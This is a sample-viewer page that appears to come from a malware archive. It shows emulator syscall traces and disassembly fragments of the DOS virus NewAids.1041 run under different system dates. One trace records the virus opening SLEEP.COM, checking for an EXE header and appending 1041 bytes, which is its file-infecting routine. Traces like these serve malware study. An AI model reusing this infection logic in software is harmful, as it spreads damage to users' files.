Sample viewer

vx.netlux.org/Virus.DOS.NewAids.1041

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T21:51:51.602887485Z	47	PC: 12e7b \| Get disk transfer address
2018-12-17T21:51:51.605681521Z	26	PC: 12e8e \| Set disk transfer address
2018-12-17T21:51:51.607534365Z	42	PC: 12e9b \| Get date 0x12e9b: cmp cx, 0x7ca 0x12e9f: jge 0x12ea4 0x12ea1: jmp 0x12ee7 0x12ea3: nop 0x12ea4: pop si 0x12ea5: push si 0x12ea6: mov ah, 0xe 0x12ea8: mov al, byte ptr [si - 0x119] 0x12eac: cmp al, 0 0x12eae: je 0x12ebe 0x12eb0: int 0x10 0x12eb2: inc si 0x12eb3: push cx 0x12eb4: mov cx, 0xffff 0x12eb7: or ax, ax 0x12eb9: loop 0x12eb7 0x12ebb: pop cx 0x12ebc: jmp 0x12ea6 0x12ebe: pop si 0x12ebf: push si

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":183,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:20.206343779Z	47	PC: 12e7b \| Get disk transfer address
2018-12-25T11:40:20.207654935Z	26	PC: 12e8e \| Set disk transfer address
2018-12-25T11:40:20.209030121Z	42	PC: 12e9b \| Get date 0x12e9b: cmp cx, 0x7ca 0x12e9f: jge 0x12ea4 0x12ea1: jmp 0x12ee7 0x12ea3: nop 0x12ea4: pop si 0x12ea5: push si 0x12ea6: mov ah, 0xe 0x12ea8: mov al, byte ptr [si - 0x119] 0x12eac: cmp al, 0 0x12eae: je 0x12ebe 0x12eb0: int 0x10 0x12eb2: inc si 0x12eb3: push cx 0x12eb4: mov cx, 0xffff 0x12eb7: or ax, ax 0x12eb9: loop 0x12eb7 0x12ebb: pop cx 0x12ebc: jmp 0x12ea6 0x12ebe: pop si 0x12ebf: push si
2018-12-25T11:40:20.210711695Z	78	PC: 12f6a \| Find first file
2018-12-25T11:40:20.214654463Z	67	PC: 12fa9 \| Get or set file attributes
2018-12-25T11:40:20.219510077Z	67	PC: 12fbb \| Get or set file attributes
2018-12-25T11:40:20.232128291Z	61	PC: 12fc6 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:20.236606732Z	87	PC: 12fd4 \| Get or set file date and time
2018-12-25T11:40:20.238286915Z	44	PC: 12fe0 \| Get time 0x12fe0: and dh, 7 0x12fe3: mov ah, 0x3f 0x12fe5: mov cx, 3 0x12fe8: mov dx, 0xd 0x12feb: nop 0x12fec: add dx, si 0x12fee: int 0x21 0x12ff0: jb 0x13058 0x12ff2: push ax 0x12ff3: mov ax, word ptr [si + 0xd] 0x12ff6: nop 0x12ff7: cmp ax, 0x4d5a 0x12ffa: je 0x12fcb 0x12ffc: cmp ax, 0x5a4d 0x12fff: je 0x12fcb 0x13001: pop ax 0x13002: cmp ax, 3 0x13005: jne 0x13058 0x13007: mov ax, 0x4202 0x1300a: mov cx, 0
2018-12-25T11:40:20.240082794Z	63	PC: 12ff0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:40:20.244283947Z	66	PC: 13012 \| Move file pointer
2018-12-25T11:40:20.246208518Z	64	PC: 12e56 \| Write file or device (Write 1041 bytes on handle 5)
2018-12-25T11:40:20.252128842Z	66	PC: 13049 \| Move file pointer
2018-12-25T11:40:20.256981069Z	64	PC: 13058 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:20.265424638Z	87	PC: 1306b \| Get or set file date and time
2018-12-25T11:40:20.267459256Z	62	PC: 1306f \| Close file
2018-12-25T11:40:20.276722812Z	67	PC: 1307e \| Get or set file attributes
2018-12-25T11:40:20.288202201Z	26	PC: 1308b \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":183,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:20.203663829Z	47	PC: 12e7b \| Get disk transfer address
2018-12-25T11:40:20.205211589Z	26	PC: 12e8e \| Set disk transfer address
2018-12-25T11:40:20.206300369Z	42	PC: 12e9b \| Get date 0x12e9b: cmp cx, 0x7ca 0x12e9f: jge 0x12ea4 0x12ea1: jmp 0x12ee7 0x12ea3: nop 0x12ea4: pop si 0x12ea5: push si 0x12ea6: mov ah, 0xe 0x12ea8: mov al, byte ptr [si - 0x119] 0x12eac: cmp al, 0 0x12eae: je 0x12ebe 0x12eb0: int 0x10 0x12eb2: inc si 0x12eb3: push cx 0x12eb4: mov cx, 0xffff 0x12eb7: or ax, ax 0x12eb9: loop 0x12eb7 0x12ebb: pop cx 0x12ebc: jmp 0x12ea6 0x12ebe: pop si 0x12ebf: push si